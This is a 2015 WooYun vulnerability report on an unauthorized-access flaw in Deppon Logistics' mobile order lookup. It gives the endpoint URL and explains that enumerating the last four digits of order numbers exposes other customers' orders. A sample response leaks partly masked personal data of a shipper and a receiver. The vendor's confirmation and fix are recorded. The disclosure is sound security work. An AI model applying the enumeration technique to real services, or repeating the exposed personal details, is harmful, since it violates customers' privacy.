当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090119

漏洞标题:德邦物流订单信息未授权访问

相关厂商:deppon.com

漏洞作者: 专业种田

提交时间:2015-01-05 20:00

修复时间:2015-01-13 08:14

公开时间:2015-01-13 08:14

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:12

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-05: 细节已通知厂商并且等待厂商处理中
2015-01-06: 厂商已经确认,细节仅向厂商公开
2015-01-13: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

RT

详细说明:

M站订单未授权访问,可遍历,无需登录。

http://m.deppon.com/mow/order/queryOrderDetail.jspa?orderNumber=SW150105892431


随便下了个订单,遍历后4位。

{"message":"","detail":"{\"order\":{\"resource\":\"MOW\",\"memberType\":null,\"deliveryMode\":\"PICKSELF\",\"couponNumber\":null,\"orderNumber\":\"SW150105892317\",\"ifElecBillBigCust\":null,\"shipperName\":\"刘俊生\",\"contactProvince\":\"广东\",\"contactCity\":\"深圳市\",\"contactArea\":\"福田区\",\"contactAddress\":\"华发北路京华大厦汇通安防数码港二楼B023\",\"waybillNumber\":null,\"orderType\":null,\"reciveLoanAccount\":null,\"receiver\":null,\"goodsName\":null,\"orderTime\":1420453311453,\"orderStatus\":\"CANCEL\",\"shipperId\":\"515634\",\"acceptDept\":\"11178\",\"acceptDeptName\":\"深圳华强太平洋营业部\",\"accepterPersonMobile\":null,\"channelCustId\":\"凯骏科技\",\"channelNumber\":\"SW150105892317\",\"channelType\":null,\"shipperNumber\":\"515634\",\"contactManId\":\"ljs1351068--打码--\",\"contactName\":\"刘--打码--\",\"contactMobile\":\"1351068--打码--\",\"contactPhone\":null,\"contactAddrRemark\":null,\"dealPerson\":null,\"feedbackInfo\":\"撤销订单\",\"startStation\":\"DP01285\",\"startStationName\":\"深圳华强太平洋营业部\",\"receivingToPoint\":null,\"receivingToPointName\":null,\"transportMode\":\"JZKH\",\"goodsNumber\":null,\"goodsType\":null,\"totalWeight\":0.0,\"totalVolume\":0.0,\"isReceiveGoods\":false,\"beginAcceptTime\":null,\"endAcceptTime\":null,\"orderAcceptTime\":null,\"paymentType\":null,\"isSendmessage\":false,\"insuredAmount\":null,\"returnBillType\":\"NO_RETURN_SIGNED\",\"packing\":null,\"reviceMoneyAmount\":0.0,\"reciveLoanType\":\"INTRADAY\",\"receiverCustId\":null,\"receiverCustNumber\":null,\"receiverCustName\":\"林*\",\"receiverCustMobile\":\"1333683打码\",\"receiverCustPhone\":null,\"receiverCustCity\":\"湖州市\",\"receiverCustProvince\":\"浙江\",\"receiverCustArea\":\"吴兴区\",\"receiverCustAddress\":\"颐高数码广场三楼--打码---\",\"receiverCustAddrRemark\":null,\"receiverCustcompany\":null,\"transNote\":null,\"hastenCount\":0,\"lastHastenTime\":null,\"onlineName\":null,\"operationLogs\":[],\"accountName\":null,\"orderPerson\":null,\"tradeDocPerson\":null,\"tradeDocPerEmpCode\":null,\"tradeDocPerMarkCode\":null,\"id\":\"516092872\",\"createUser\":null,\"modifyUser\":null,\"createDate\":1420453311000,\"modifyDate\":1420453409000},\"orders\":null,\"message\":\"成功\",\"code\":\"10000\"}","count":0,"code":"1000"}

漏洞证明:

depoom11.png

修复方案:

权限控制

版权声明:转载请注明来源 专业种田@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-01-06 14:26

厂商回复:

再次感谢您的帮助。
漏洞已着手修复,还望给予更多反馈。谢谢

最新状态:

2015-01-13:修复完毕,谢谢各位的关注